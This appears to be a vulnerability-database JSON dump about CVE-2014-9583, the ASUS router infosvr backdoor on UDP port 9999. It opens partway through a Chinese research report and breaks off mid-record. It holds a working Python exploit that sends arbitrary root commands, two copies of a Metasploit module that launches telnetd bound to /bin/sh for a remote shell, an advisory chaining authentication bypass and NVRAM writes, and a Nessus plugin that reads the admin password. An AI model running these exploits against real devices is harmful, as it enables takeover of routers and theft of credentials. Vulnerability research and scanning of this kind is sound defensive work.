src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image045.png\" alt=\"image045\" width=\"554\" height=\"286\">RT-N66U\uff0c37156\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/222222.jpg\" alt=\"222222\" width=\"555\" height=\"290\">RT-AC87U\uff0c1314\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image049.png\" alt=\"image049\" width=\"539\" height=\"283\">RT-N56U\uff0c23974\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image051.png\" alt=\"image051\" width=\"518\" height=\"322\">\u8def\u7531\u5668\u7cfb\u7edf\u7ba1\u7406\u7aef\u53e3\u6b63\u5e38\u60c5\u51b5\u4e0b\u662f\u4e0d\u4f1a\u66b4\u6f0f\u5728\u516c\u7f51\u4e0a\u7684\uff0c\u6211\u4eec\u68c0\u7d22\u5230\u7684\u53ea\u662f\u66b4\u6f0f\u5728\u516c\u7f51\u4e0a\u5f00\u653e\u7ba1\u7406\u7aef\u53e3\u8def\u7531\u5668\u8bbe\u5907\u7684\uff0c\u76f8\u4fe1\u8fd8\u6709\u66f4\u591a\u7684\u8bbe\u5907\u9690\u85cf\u5728\u80cc\u540e\u3002\u6240\u4ee5\uff0c\u5efa\u8bae\u4f7f\u7528\u8005\u5c3d\u5feb\u5347\u7ea7\u534e\u7855\u8def\u7531\u5668\u7cfb\u7edf\u3002\u76f8\u5173\u8d44\u6e90\u94fe\u63a5<ol><li><a href=\"http://www.freebuf.com/news/56074.html\">http://www.freebuf.com/news/56074.html</a></li><li><a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a></li><li><a href=\"https://github.com/RMerl/asuswrt-merlin\">https://github.com/RMerl/asuswrt-merlin</a></li><li><a href=\"http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/\">http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/</a></li></ol> PDF \u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"http://whttp://blog.knownsec.com/wp-content/uploads/2015/01/%E5%8D%8E%E7%A1%95%E8%B7%AF%E7%94%B1%E5%99%A89999%E7%AB%AF%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A-V1.pdfww.example.com\" target=\"_blank\">\u534e\u7855\u8def\u7531\u56689999\u7aef\u53e3\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7814\u7a76\u62a5\u544a V1</a> ", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "seebug", "title": "ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-07-02T00:00:00", "id": "SSV:89236", "href": "https://www.seebug.org/vuldb/ssvid-89236", "sourceData": "\n #!/usr/bin/env python3\n\n# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution\n# Date: 2014-10-11\n# Vendor Homepage: http://www.asus.com/\n# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip\n# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip\n# Tested Version: 3.0.0.4.376_1071-g8696125\n# Tested Device: RT-N66U\n\n# Description:\n# A service called \"infosvr\" listens on port 9999 on the LAN bridge.\n# Normally this service is used for device discovery using the\n# \"ASUS Wireless Router Device Discovery Utility\", but this service contains a\n# feature that allows an unauthenticated user on the LAN to execute commands\n# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.\n# \"iboxcom.h\" is in asuswrt/release/src/router/shared.\n#\n# Affected devices may also include wireless repeaters and other networking\n# products, especially the ones which have \"Device Discovery\" in their features\n# list.\n#\n# Using broadcast address as the IP address should work and execute the command\n# on all devices in the network segment, but only receiving one response is\n# supported by this script.\n\nimport sys, os, socket, struct\n\n\nPORT = 9999\n\nif len(sys.argv) < 3:\n print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)\n sys.exit(1)\n\n\nip = sys.argv[1]\ncmd = sys.argv[2]\n\nenccmd = cmd.encode()\n\nif len(enccmd) > 237:\n # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. \n print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)\n sys.exit(1)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('0.0.0.0', PORT))\nsock.settimeout(2)\n\n# Request consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_CMD\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Comment: \"Or Transaction ID\"\n# MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\n# Password [byte[32]] ; Not checked at all\n# Length [word]\n# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable\n\npacket = (b'\\x0C\\x15\\x33\\x00' + os.urandom(4) + (b'\\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\\x00')\n\nsock.sendto(packet, (ip, PORT))\n\n\n# Response consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_RES\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Equal to Info of request\n# MacAddress [byte[6]] ; Filled in for us\n# Length [word]\n# Result [byte[420]] ; Actually returns that amount\n\nwhile True:\n data, addr = sock.recvfrom(512)\n\n if len(data) == 512 and data[1] == 22:\n break\n\nlength = struct.unpack('<H', data[14:16])[0]\ns = slice(16, 16+length)\nsys.stdout.buffer.write(data[s])\n\nsock.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89236", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-22T22:06:03", "description": "This Metasploit module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This Metasploit module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shell. This Metasploit module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35. Numerous ASUS models are reportedly affected, but untested.", "cvss3": {}, "published": "2018-04-22T00:00:00", "type": "zdt", "title": "ASUS infosvr Authentication Bypass Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2018-04-22T00:00:00", "id": "1337DAY-ID-30222", "href": "https://0day.today/exploit/description/30222", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ASUS infosvr Auth Bypass Command Execution',\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in the\r\n infosvr service running on UDP port 9999 on various ASUS routers to\r\n execute arbitrary commands as root.\r\n\r\n This module launches the BusyBox Telnet daemon on the port specified\r\n in the TelnetPort option to gain an interactive remote shell.\r\n\r\n This module was tested successfully on an ASUS RT-N12E with firmware\r\n version 2.0.0.35.\r\n\r\n Numerous ASUS models are reportedly affected, but untested.\r\n },\r\n 'Author' =>\r\n [\r\n 'Friedrich Postelstorfer', # Initial public disclosure and Python exploit\r\n 'jduck', # Independent discovery and C exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'References' =>\r\n [\r\n ['CVE', '2014-9583'],\r\n ['EDB', '35688'],\r\n ['URL', 'https://github.com/jduck/asus-cmd']\r\n ],\r\n 'DisclosureDate' => 'Jan 4 2015',\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find'\r\n }\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n Opt::RPORT(9999),\r\n OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),\r\n OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),\r\n OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])\r\n ]\r\n register_advanced_options [\r\n # If the session is killed (CTRL+C) rather than exiting cleanly,\r\n # the telnet port remains open, but is unresponsive, and prevents\r\n # re-exploitation until the device is rebooted.\r\n OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])\r\n ]\r\n end\r\n\r\n def telnet_timeout\r\n (datastore['TelnetTimeout'] || 10)\r\n end\r\n\r\n def telnet_port\r\n datastore['TelnetPort']\r\n end\r\n\r\n def request(cmd)\r\n pkt = ''\r\n # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\r\n pkt << \"\\x0C\"\r\n # PacketType [byte] ; NET_PACKET_TYPE_CMD\r\n pkt << \"\\x15\"\r\n # OpCode [word] ; NET_CMD_ID_MANU_CMD\r\n pkt << \"\\x33\\x00\"\r\n # Info [dword] ; Comment: \"Or Transaction ID\"\r\n pkt << Rex::Text.rand_text_alphanumeric(4)\r\n # MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\r\n pkt << Rex::Text.rand_text_alphanumeric(6)\r\n # Password [byte[32]] ; Not checked at all\r\n pkt << \"\\x00\" * 32\r\n # Command Length + \\x00 + Command padded to 512 bytes\r\n pkt << ([cmd.length].pack('C') + \"\\x00\" + cmd).ljust((512 - pkt.length), \"\\x00\")\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n print_status \"#{rhost} - Starting telnetd on port #{telnet_port}...\"\r\n udp_sock.put request \"telnetd -l /bin/sh -p #{telnet_port}\"\r\n disconnect_udp\r\n\r\n vprint_status \"#{rhost} - Waiting for telnet service to start on port #{telnet_port}...\"\r\n Rex.sleep 3\r\n\r\n vprint_status \"#{rhost} - Connecting to #{rhost}:#{telnet_port}...\"\r\n\r\n sock = Rex::Socket.create_tcp 'PeerHost' => rhost,\r\n 'PeerPort' => telnet_port,\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self },\r\n 'Timeout' => telnet_timeout\r\n\r\n if sock.nil?\r\n fail_with Failure::Unreachable, \"Telnet service unreachable on port #{telnet_port}\"\r\n end\r\n\r\n vprint_status \"#{rhost} - Trying to establish a telnet session...\"\r\n\r\n prompt = negotiate_telnet sock\r\n if prompt.nil?\r\n sock.close\r\n fail_with Failure::Unknown, 'Unable to establish a telnet session'\r\n end\r\n\r\n print_good \"#{rhost} - Telnet session successfully established...\"\r\n\r\n handler sock\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n prompt = '#'\r\n Timeout.timeout(datastore['TelnetBannerTimeout']) do\r\n while true\r\n data = sock.get_once(-1, telnet_timeout)\r\n if !data or data.length == 0\r\n return nil\r\n elsif data.include? prompt\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\nend\n\n# 0day.today [2018-04-22] #", "sourceHref": "https://0day.today/exploit/30222", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-04-22T01:28:46", "description": "", "cvss3": {}, "published": "2018-04-21T00:00:00", "type": "packetstorm", "title": "ASUS infosvr Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2018-04-21T00:00:00", "id": "PACKETSTORM:147284", "href": "https://packetstormsecurity.com/files/147284/ASUS-infosvr-Authentication-Bypass-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ASUS infosvr Auth Bypass Command Execution', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in the \ninfosvr service running on UDP port 9999 on various ASUS routers to \nexecute arbitrary commands as root. \n \nThis module launches the BusyBox Telnet daemon on the port specified \nin the TelnetPort option to gain an interactive remote shell. \n \nThis module was tested successfully on an ASUS RT-N12E with firmware \nversion 2.0.0.35. \n \nNumerous ASUS models are reportedly affected, but untested. \n}, \n'Author' => \n[ \n'Friedrich Postelstorfer', # Initial public disclosure and Python exploit \n'jduck', # Independent discovery and C exploit \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit \n], \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'References' => \n[ \n['CVE', '2014-9583'], \n['EDB', '35688'], \n['URL', 'https://github.com/jduck/asus-cmd'] \n], \n'DisclosureDate' => 'Jan 4 2015', \n'Privileged' => true, \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find' \n} \n}, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0)) \nregister_options [ \nOpt::RPORT(9999), \nOptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]), \nOptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]), \nOptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25]) \n] \nregister_advanced_options [ \n# If the session is killed (CTRL+C) rather than exiting cleanly, \n# the telnet port remains open, but is unresponsive, and prevents \n# re-exploitation until the device is rebooted. \nOptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit']) \n] \nend \n \ndef telnet_timeout \n(datastore['TelnetTimeout'] || 10) \nend \n \ndef telnet_port \ndatastore['TelnetPort'] \nend \n \ndef request(cmd) \npkt = '' \n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO \npkt << \"\\x0C\" \n# PacketType [byte] ; NET_PACKET_TYPE_CMD \npkt << \"\\x15\" \n# OpCode [word] ; NET_CMD_ID_MANU_CMD \npkt << \"\\x33\\x00\" \n# Info [dword] ; Comment: \"Or Transaction ID\" \npkt << Rex::Text.rand_text_alphanumeric(4) \n# MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp \npkt << Rex::Text.rand_text_alphanumeric(6) \n# Password [byte[32]] ; Not checked at all \npkt << \"\\x00\" * 32 \n# Command Length + \\x00 + Command padded to 512 bytes \npkt << ([cmd.length].pack('C') + \"\\x00\" + cmd).ljust((512 - pkt.length), \"\\x00\") \nend \n \ndef exploit \nconnect_udp \nprint_status \"#{rhost} - Starting telnetd on port #{telnet_port}...\" \nudp_sock.put request \"telnetd -l /bin/sh -p #{telnet_port}\" \ndisconnect_udp \n \nvprint_status \"#{rhost} - Waiting for telnet service to start on port #{telnet_port}...\" \nRex.sleep 3 \n \nvprint_status \"#{rhost} - Connecting to #{rhost}:#{telnet_port}...\" \n \nsock = Rex::Socket.create_tcp 'PeerHost' => rhost, \n'PeerPort' => telnet_port, \n'Context' => { 'Msf' => framework, 'MsfExploit' => self }, \n'Timeout' => telnet_timeout \n \nif sock.nil? \nfail_with Failure::Unreachable, \"Telnet service unreachable on port #{telnet_port}\" \nend \n \nvprint_status \"#{rhost} - Trying to establish a telnet session...\" \n \nprompt = negotiate_telnet sock \nif prompt.nil? \nsock.close \nfail_with Failure::Unknown, 'Unable to establish a telnet session' \nend \n \nprint_good \"#{rhost} - Telnet session successfully established...\" \n \nhandler sock \nend \n \ndef negotiate_telnet(sock) \nprompt = '#' \nTimeout.timeout(datastore['TelnetBannerTimeout']) do \nwhile true \ndata = sock.get_once(-1, telnet_timeout) \nif !data or data.length == 0 \nreturn nil \nelsif data.include? prompt \nreturn true \nend \nend \nend \nrescue ::Timeout::Error \nreturn nil \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147284/asus_infosvr_auth_bypass_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T08:23:18", "description": "", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "packetstorm", "title": "AsusWRT Router Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-26T00:00:00", "id": "PACKETSTORM:146102", "href": "https://packetstormsecurity.com/files/146102/AsusWRT-Router-Remote-Code-Execution.html", "sourceData": "`>> Unauthenticated LAN remote code execution in AsusWRT \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 22/01/2018 / Last updated: 25/01/2018 \n \n \n>> Background and summary \nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. \nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. \n \nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. \n \nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). \n \n \n>> Technical details: \n#1 \nVulnerability: HTTP server authentication bypass \nCVE-2018-5999 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. \nIn AsusWRT_source/router/httpd/httpd.c: \n \nhandle_request(void) \n{ \n... \nhandler->auth(auth_userid, auth_passwd, auth_realm); \nauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); \n \nif (auth_result != 0) <--- auth fails \n{ \nif(strcasecmp(method, \"post\") == 0){ \nif (handler->input) { \nhandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed \n} \nsend_login_page(fromapp, auth_result, NULL, NULL, 0); \n} \n//if(!fromapp) http_logout(login_ip_tmp, cookies); \nreturn; \n} \n... \n} \n \nThis can (and will) be combined with other vulnerabilities to achieve remote code execution. \n \n \n#2 \nVulnerability: Unauthorised configuration change (NVRAM value setting) \nCVE-2018-6000 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. \nIn AsusWRT_source/router/httpd/web.c: \n \ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary) \n{ \n... \nif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) { \nif(strstr(post_buf, \"name=\\\"file\\\"\")) \nbreak; \nelse if(strstr(post_buf, \"name=\\\"\")) { \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \np = post_buf; \nname = strstr(p, \"\\\"\") + 1; \np = strstr(name, \"\\\"\"); \nstrcpy(p++, \"\\0\"); \nvalue = strstr(p, \"\\r\\n\\r\\n\") + 4; \np = strstr(value, \"\\r\"); \nstrcpy(p, \"\\0\"); \n//printf(\"%s=%s\\n\", name, value); \nnvram_set(name, value); \n} \n} \n... \n} \n \nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. \n \nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. \n \nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. \nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). \n \nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. \n \n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). \n \nPacket structure (from AsusWRT_source/router/shared/iboxcom.h): \n- Header \ntypedef struct iboxPKTEx \n{ \nBYTE ServiceID; \nBYTE PacketType; \nWORD OpCode; \nDWORD Info; // Or Transaction ID \nBYTE MacAddress[6]; \nBYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string \n} ibox_comm_pkt_hdr_ex; \n \n- Body \ntypedef struct iboxPKTCmd \n{ \nWORD len; \nBYTE cmd[420]; <--- command goes here \n} PKT_SYSCMD; // total 422 bytes \n \nA Metasploit module exploiting this vulnerability has been released [3]. \n \n \n>> Fix: \nUpgrade to AsusWRT v3.0.0.4.384.10007 or above. \nSee [4] for the very few details and new firmware released by Asus. \n \n \n>> References: \n[1] https://blogs.securiteam.com/index.php/archives/3589 \n[2] https://github.com/jduck/asus-cmd \n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb \n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business >> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146102/asuswrt3-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-12-02T15:49:55", "description": "The remote device is an ASUS router that contains firmware which is affected by a flaw in its 'infosvr' service due to not properly checking the MAC address of a request. An unauthenticated, remote attacker, using a crafted request to UDP port 9999, can exploit this to run arbitrary commands or access configuration details (including passwords) on the device.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "ASUS Router 'infosvr' Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:asus:rt-ac66u_firmware", "cpe:/o:asus:rt-n66u_firmware"], "id": "ASUSWRT_INFOSVR_COMMAND_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/80518", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80518);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-9583\");\n script_bugtraq_id(71889);\n script_xref(name:\"EDB-ID\", value:\"35688\");\n\n script_name(english:\"ASUS Router 'infosvr' Remote Command Execution\");\n script_summary(english:\"Attempts to exploit the ASUS Router 'infosvr' service backdoor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device contains a backdoor.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote device is an ASUS router that contains firmware which is\naffected by a flaw in its 'infosvr' service due to not properly\nchecking the MAC address of a request. An unauthenticated, remote\nattacker, using a crafted request to UDP port 9999, can exploit this\nto run arbitrary commands or access configuration details (including\npasswords) on the device.\");\n # https://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba42dc23\");\n script_set_attribute(attribute:\"see_also\", value:\"https://event.asus.com/2013/nw/ASUSWRT/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jduck/asus-cmd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact the device vendor regarding the availability of an update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ASUS infosvr Auth Bypass Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-ac66u_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-n66u_firmware\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Backdoors\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_require_udp_ports(9999);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"raw.inc\");\ninclude(\"data_protection.inc\");\n\nport = 9999;\n\nif (islocalhost()) exit(0, \"This plugin can not be run against the localhost.\");\nif (!islocalnet()) exit(0, \"The remote host is more than one hop away.\");\n\nif (known_service(port:port, ipproto:\"udp\")) audit(AUDIT_SVC_ALREADY_KNOWN, port);\nif (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"udp\");\n\nset_byte_order(BYTE_ORDER_LITTLE_ENDIAN);\n\nfunction run_command(udp_socket, command, timeout)\n{\n local_var packet, ll, bpf, output, res, pkt, data, out_len;\n\n output = NULL;\n\n packet =\n mkbyte(0x0C) +\n mkbyte(0x15) +\n mkword(0x0033) +\n mkdword(rand()) +\n mkpad(38) +\n mkword(strlen(command)) +\n command;\n\n packet = packet + mkpad(512 - strlen(packet));\n\n ll = link_layer();\n if (isnull(ll)) exit(1, \"Could not find the link layer we are operating on.\");\n\n bpf = bpf_open(\"udp and src port 9999 and dst port 9999 and dst host 255.255.255.255\");\n if (isnull(bpf)) exit(1, \"Could not obtain a bpf.\");\n\n send(socket:udp_socket, data:packet);\n\n res = bpf_next(bpf:bpf, timeout:timeout);\n if (!isnull(res))\n {\n res = substr(res, strlen(ll), strlen(res) - 1);\n if (!isnull(res))\n {\n pkt = packet_split(res);\n if (!isnull(pkt) && !isnull(pkt[2]) &&!isnull(pkt[2]['data']))\n {\n data = pkt[2]['data'];\n if (strlen(data) >= 16)\n {\n out_len = getword(blob:data, pos:14);\n if (out_len > 0)\n {\n output = chomp(substr(data, 16, 15 + out_len));\n }\n }\n }\n }\n }\n\n bpf_close(bpf);\n\n return output;\n}\n\ns = open_sock_udp(port);\nif (!s) audit(AUDIT_SOCK_FAIL, port, \"udp\");\n\ntimeout = get_read_timeout() * 1000;\n\nwps_mfstring = run_command(udp_socket:s, command:\"nvram get wps_mfstring\", timeout:timeout);\n\nif (\"ASUS\" >!< wps_mfstring) audit(AUDIT_NOT_LISTEN, \"The ASUSWRT 'infosvr' service\", port, \"udp\");\n\nuser = run_command(udp_socket:s, command:\"nvram get http_username\", timeout:timeout);\npass = run_command(udp_socket:s, command:\"nvram get http_passwd\", timeout:timeout);\n\n# mask the actual password except the first and last character\nif (!isnull(pass) && strlen(pass) >= 2)\n pass = pass[0] + crap(data:'*', length:6) + pass[strlen(pass)-1];\n\nregister_service(port:port, ipproto:\"udp\", proto:\"asuswrt_infosvr\");\n\nif (report_verbosity > 0 && !isnull(user) && !isnull(pass))\n{\n report =\n '\\nNessus was able to exploit the vulnerability to gather the HTTP' +\n '\\ncredentials of the ASUS router:' +\n '\\n' +\n '\\n Username : ' + data_protection::sanitize_user_enum(users:user) +\n '\\n Password : ' + pass +\n '\\n' +\n '\\nNote that the password displayed here has been partially obfuscated.' +\n '\\n';\n\n security_hole(port:port, proto:\"udp\", extra:report);\n}\nelse security_hole(port:port, proto:\"udp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-11-10T10:48:24", "description": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.", "cvss3": {}, "published": "2015-01-08T20:59:00", "type": "cve", "title": "CVE-2014-9583", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 